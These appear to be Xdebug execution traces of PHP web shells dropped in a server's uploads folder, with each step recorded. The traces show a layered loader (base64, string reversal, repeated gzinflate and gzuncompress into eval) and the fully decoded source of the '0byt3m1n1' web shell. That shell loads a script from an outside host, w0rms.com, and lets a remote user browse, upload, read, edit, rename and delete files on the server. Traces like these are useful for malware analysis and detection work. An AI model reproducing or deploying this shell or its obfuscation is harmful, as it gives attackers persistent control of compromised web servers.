4	65	0	0.004266	465936	perms	1		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	69	1	'/var/www/html/uploads/prepend.php'
5	66	0	0.004280	465936	fileperms	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	1	'/var/www/html/uploads/prepend.php'
5	66	1	0.004294	465976
5	66	R			33261
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$perms = 33261
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info = '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4	65	1	0.004422	465976
4	65	R			'-rwxr-xr-x'
4	67	0	0.004436	465936	is_writable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/prepend.php'
4	67	1	0.004453	465976
4	67	R			FALSE
4	68	0	0.004466	465936	is_readable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/prepend.php'
4	68	1	0.004482	465976
4	68	R			TRUE
4	69	0	0.004495	465936	filemtime	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	71	1	'/var/www/html/uploads/prepend.php'
4	69	1	0.004509	465976
4	69	R			1676253028
4	70	0	0.004522	465872	date	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	71	2	'd-M-Y H:i'	1676253028
4	70	1	0.004554	466200
4	70	R			'12-Feb-2023 20:50'
3	15	1	0.004577	465872
2	7	1	0.004589	424776
1		A						/var/www/html/uploads/0byt3m1n1.php	6	$encodephp = ''
2	71	0	0.004608	422320	base64_decode	0		/var/www/html/uploads/0byt3m1n1.php	7	1	''
2	71	1	0.004621	422384
2	71	R			''
			0.004653	340728
TRACE END   [2023-02-12 23:50:54.429644]

data/traces/b03dbab41c207ac4cff71f4a9f35597e_trace-1676255981.1879.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:40:07.085728]
1	0	1	0.000175	393464
1	3	0	0.000248	398976	{main}	1		/var/www/html/uploads/0.php	0	0
1		A						/var/www/html/uploads/0.php	3	$encoder57txt = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1		A						/var/www/html/uploads/0.php	4	$r57txt = '==AZruAWY3qfKIg/wlrJFMvevml4PR8+IzinC8Umx/CM/6wbl7yH3acv8+Q+UvJ6eBbQ0n84Hwvb/HUa8fLSvqPsyMC5PM8PDnDCPTuBcGZBjlsYnNTGVhcuMfnYAR3Dxs5+YCN4WzMY6V3se4xnxMe6znhv1NrGf4+YDN4DuFM3ni8u/BvOB1r9km8ucBffgV6TFc0uBvSnoFi2zMqZhApbMEkfoqvsb56zbR9xSgd+z/oy1cyQ+15S0nudxDN0nJ1g60F/0ZDnqr1cl29Mhy65SNbnu4enNcuOXyZ62lI0bzn6bxn6uR2fDJTNQJhDw06VfgMu4pjsLvR/WPyPPtldQeKAOnq4p57STN5WDklFYtMGPKiy+P1YU/UyVjDuR3fdHrhcM+vqty5ZtlyB400v7i5NJ/1BuJ6dRGOyp5yT/X8puRlUc5oNJKFbX2gf8STln02CeQtoE1XjPSGer1+Za2e3fuW7ccKtfos2c45xYRkrL3C9v0YXinvK6FnR'
2	4	0	0.000314	398976	base64_decode	0		/var/www/html/uploads/0.php	5	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.000336	399264
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24r57txt%29%29%29%29%29%29%29%29%3B'
2	5	0	0.000358	399232	urldecode	0		/var/www/html/uploads/0.php	5	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24r57txt%29%29%29%29%29%29%29%29%3B'
2	5	1	0.000378	399456
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($r57txt))))))));'
2	6	0	0.000397	399168	htmlspecialchars_decode	0		/var/www/html/uploads/0.php	5	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($r57txt))))))));'
2	6	1	0.000416	399392
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($r57txt))))))));'
2	7	0	0.000447	401512	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($r57txt))))))));'	/var/www/html/uploads/0.php	5	0
3	8	0	0.000464	401512	strrev	0		/var/www/html/uploads/0.php(5) : eval()'d code	1	1	'==AZruAWY3qfKIg/wlrJFMvevml4PR8+IzinC8Umx/CM/6wbl7yH3acv8+Q+UvJ6eBbQ0n84Hwvb/HUa8fLSvqPsyMC5PM8PDnDCPTuBcGZBjlsYnNTGVhcuMfnYAR3Dxs5+YCN4WzMY6V3se4xnxMe6znhv1NrGf4+YDN4DuFM3ni8u/BvOB1r9km8ucBffgV6TFc0uBvSnoFi2zMqZhApbMEkfoqvsb56zbR9xSgd+z/oy1cyQ+15S0nudxDN0nJ1g60F/0ZDnqr1cl29Mhy65SNbnu4enNcuOXyZ62lI0bzn6bxn6uR2fDJTNQJhDw06VfgMu4pjsLvR/WPyPPtldQeKAOnq4p57STN5WDklFYtMGPKiy+P1YU/UyVjDuR3fdHrhcM+vqty5ZtlyB400v7i5NJ/1BuJ6dRGOyp5yT/X8puRlUc5oNJKFbX2gf8STln02CeQtoE1XjPSGer1+Za2e3fuW7ccKtfos2c45xYRkrL3C9v0YXinvK6FnR'
3	8	1	0.000492	405640
3	8	R			'AW4JkfYBaQmW9gFkCZv2eJwBWQmm9nic1Vlbc9s2Fn73jP8DgqihNIlESnYcryTS08RJ20nbZBp3Z7qWx0ORoMQJRbIgFNtV9d97DgBedbHa7D7si00C54ZzvvMBoMYX6Tw9Pjo+Yt48IcY483iYCpJxz54LkQ5N887ii6znJQvzs/vgM9EDBWdsKkHHGB0fZUzcinDBbqNwEYq21YExxnnCbzlLEy7CeKYGw6A9A9mFOwu929+XiWDZ7Sz12p3OKkg4c715u3X78cOnK+JmpPWZPdhO64sbLVlnpcavcfCG2CQT4D2L3GzOsraWGa3Xx0cXzvHR+MnlhzdXv318S+ZiETlj/Ze5vjOOwvgzmXMW2JQSziKbZuIhYmCHCUrEQ8psKti9ML0so85YhCJijjV9ECeLftwfm2oAfJSGDExUBpkKklhkvVmSzCLmpqFKGti5CNxFGD3Y/746GZwY0qtRejXQmnzdcD9N/IfV1PU+z3iyjP0heTo4AxPnIy+J'
3	9	0	0.000520	405608	base64_decode	0		/var/www/html/uploads/0.php(5) : eval()'d code	1	1	'AW4JkfYBaQmW9gFkCZv2eJwBWQmm9nic1Vlbc9s2Fn73jP8DgqihNIlESnYcryTS08RJ20nbZBp3Z7qWx0ORoMQJRbIgFNtV9d97DgBedbHa7D7si00C54ZzvvMBoMYX6Tw9Pjo+Yt48IcY483iYCpJxz54LkQ5N887ii6znJQvzs/vgM9EDBWdsKkHHGB0fZUzcinDBbqNwEYq21YExxnnCbzlLEy7CeKYGw6A9A9mFOwu929+XiWDZ7Sz12p3OKkg4c715u3X78cOnK+JmpPWZPdhO64sbLVlnpcavcfCG2CQT4D2L3GzOsraWGa3Xx0cXzvHR+MnlhzdXv318S+ZiETlj/Ze5vjOOwvgzmXMW2JQSziKbZuIhYmCHCUrEQ8psKti9ML0so85YhCJijjV9ECeLftwfm2oAfJSGDExUBpkKklhkvVmSzCLmpqFKGti5CNxFGD3Y/746GZwY0qtRejXQmnzdcD9N/IfV1PU+z3iyjP0heTo4AxPnIy+J'
3	9	1	0.000554	409736
3	9	R			'\001n\t��\001i\t��\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\00'
3	10	0	0.000644	405608	gzinflate	0		/var/www/html/uploads/0.php(5) : eval()'d code	1	1	'\001n\t��\001i\t��\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\00'
3	10	1	0.000738	408200
3	10	R			'\001i\t��\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�'
3	11	0	0.000827	404072	gzinflate	0		/var/www/html/uploads/0.php(5) : eval()'d code	1	1	'\001i\t��\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�'
3	11	1	0.000912	406664
3	11	R			'\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\'
3	12	0	0.000998	404072	gzinflate	0		/var/www/html/uploads/0.php(5) : eval()'d code	1	1	'\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\'
3	12	1	0.001081	406664
3	12	R			'x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\'
3	13	0	0.001167	404072	gzuncompress	0		/var/www/html/uploads/0.php(5) : eval()'d code	1	1	'x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\'
3	13	1	0.001250	406664
3	13	R			'x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\021��*\037C'
3	14	0	0.001335	404072	gzuncompress	0		/var/www/html/uploads/0.php(5) : eval()'d code	1	1	'x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\021��*\037C'
3	14	1	0.001460	412296
3	14	R			'<?php\r\n\r\necho \'<script src=http://w0rms.com/kaydet.php></script>\';\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}\r\n?>\r\n<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>\r\n<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>\r\n<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;fon'
3	15	0	0.001757	462352	eval	1	'?><?php\r\n\r\necho \'<script src=http://w0rms.com/kaydet.php></script>\';\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}\r\n?>\r\n<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>\r\n<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>\r\n<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;font-size: 14px;}h1{font-family:\'VT323\';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:\'Courier\'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>\r\n</head><body> <?php echo\'<div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1</center></h1></div>\';\r\nif(isset($_GET[\'path\'])) {$path = $_GET[\'path\'];chdir($_GET[\'path\']);} else {$path = getcwd();}\r\n$path = str_replace("\\\\","/",$path);$paths = explode("/", $path);\r\necho \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';echo "<font style=\'font-size:13px;\'>Path: ";\r\nforeach($paths as $id => $pat) {echo "<a style=\'font-size:13px;\' href=\'?path=";\r\nfor($i = 0; $i <= $id; $i++) {echo $paths[$i];\r\nif($i != $id) {echo "/";} }echo "\'>$pat</a>/";}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/>\r\n<input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<center><font color="#00ff00">Upload OK!.</font></center><br/>\';}\r\nelse{echo \'<center><font color="red">Upload Failed!.</font></center><br/>\';}}\r\necho \'</td></tr><tr><td></table>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';echo "".basename($_GET[\'filesrc\']);"";echo \'</tr></td></table><br />\';echo("<center><textarea readonly=\'\'>".htmlspecialchars(file_get_contents($_GET[\'filesrc\']))."</textarea></center>");}\r\nelseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n}else{\r\necho \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n} $_POST[\'name\'] = $_POST[\'newname\'];}\r\necho \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');if(fwrite($fp,$_POST[\'src\'])){echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n}else{echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';}fclose($fp);}\r\necho \'<form method="POST"><textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br /><input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';}echo \'</center>\';}else{echo \'</table><br /><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n}else{echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){echo \'<font color="#00ff00">Delete File Done.</font><br />\';}else{\r\necho \'<font color="red">Delete File Error.</font><br />\';}}}echo \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first">\r\n<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>\r\n<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="#00ff00">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\necho"</center></td><td><center>".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "</center></td>\r\n<td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";}\r\nforeach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);if($size >= 1024){$size = round($size/1024,2).\' MB\';}else{$size = $size.\' KB\';}\r\necho "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>".$size."</center></td><td><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="#00ff00">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\necho"</center></td><td><center>".date("d-M-Y H:i",filemtime("$path/$file"))."";\r\necho "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";}\r\necho \'</table></div>\';}echo \'</body></html>\';\r\nfunction perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = \'s\';} elseif (($perms & 0xA000) == 0xA000) {$info = \'l\';} elseif (($perms & 0x8000) == 0x8000) {$info = \'-\';} elseif (($perms & 0x6000) == 0x6000) {$info = \'b\';} elseif (($perms & 0x4000) == 0x4000) {$info = \'d\';} elseif (($perms & 0x2000) == 0x2000) {$info = \'c\';} elseif (($perms & 0x1000) == 0x1000) {$info = \'p\';} else {$info = \'u\';} $info .= (($perms & 0x0100) ? \'r\' : \'-\');$info .= (($perms & 0x0080) ? \'w\' : \'-\');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\' ) : (($perms & 0x0800) ? \'S\' : \'-\'));$info .= (($perms & 0x0020) ? \'r\' : \'-\');$info .= (($perms & 0x0010) ? \'w\' : \'-\');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\' ) : (($perms & 0x0400) ? \'S\' : \'-\'));$info .= (($perms & 0x0004) ? \'r\' : \'-\');$info .= (($perms & 0x0002) ? \'w\' : \'-\');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\' ) : (($perms & 0x0200) ? \'T\' : \'-\'));return $info;}\r\necho\'<br><center>&copy; 2017 - <a href="http://zerobyte.id/">ZeroByte.ID</a> Recoded from Kodong.</center><br>\';?>'	/var/www/html/uploads/0.php(5) : eval()'d code	1	0
4	16	0	0.001925	462352	set_time_limit	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	4	1	0
4	16	1	0.001944	462416
4	16	R			FALSE
4	17	0	0.001959	462384	error_reporting	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	5	1	0
4	17	1	0.001975	462424
4	17	R			22527
4	18	0	0.001988	462384	get_magic_quotes_gpc	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	6	0
4	18	1	0.002002	462384
4	18	R			FALSE
4	19	0	0.002017	462384	getcwd	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	12	0
4	19	1	0.002032	462432
4	19	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	12	$path = '/var/www/html/uploads'
4	20	0	0.002064	462432	str_replace	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	13	3	'\\'	'/'	'/var/www/html/uploads'
4	20	1	0.002082	462528
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	13	$path = '/var/www/html/uploads'
4	21	0	0.002108	462432	explode	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	13	2	'/'	'/var/www/html/uploads'
4	21	1	0.002126	463008
4	21	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	13	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	15	$id = 0
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	15	$id = 1
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	15	$id = 2
